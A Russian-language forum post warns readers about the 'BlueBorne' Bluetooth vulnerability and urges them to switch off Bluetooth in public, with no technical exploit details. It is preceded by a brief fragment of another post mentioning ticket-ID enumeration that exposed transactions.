

Располагая этой информацией, попросить пользователя подтвердить свои документы.



Статистика:


Перебрав диапазон в 160 тикетов, я получил доступ к 31 транзакции.

Показать полностью
270

Отключайте Bluetooth, или же уязвимость "BlueBorne"

Всем привет. Наверняка, в вашем телефоне/компьютере/планшете и т.д. есть Bluetooth. Оказывается, если вы его не отключаете в публичных местах это может повлечь за собой серьезные последствия. Например, над вашим телефоном будет полностью перехвачен контроль, а вы и не заметите.

Отключайте Bluetooth, или же уязвимость "BlueBorne" Вирус, Bluetooth, Android, Windows, Linux, Уязвимость, Привет читающим теги

Сначала, злоумышленник смотрит, какие есть устройства со включенным Bluetooth поблизости. Допустим, он нашел ваш телефон. Определяет MAC-адрес и операционную систему, которую вы используете. Далее, он уже может делать все что угодно, лучше всего показывает эту уязвимость данный ролик: https://www.youtube.com/watch?v=Az-l90RCns8 (Пикабу запрещает мне публиковать видео прямо в посте :( )


Из этого всего можно сделать вывод, то что даже если вы используете антивирус, не подключаетесь к публичным Wi-Fi сетям, но забыли выключить Bluetooth, то любой предприимчивый хакер может перехватить контроль над вашим банковским приложением через Bluetooth.


Отключайте Bluetooth, товарищи пикабушники.

Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: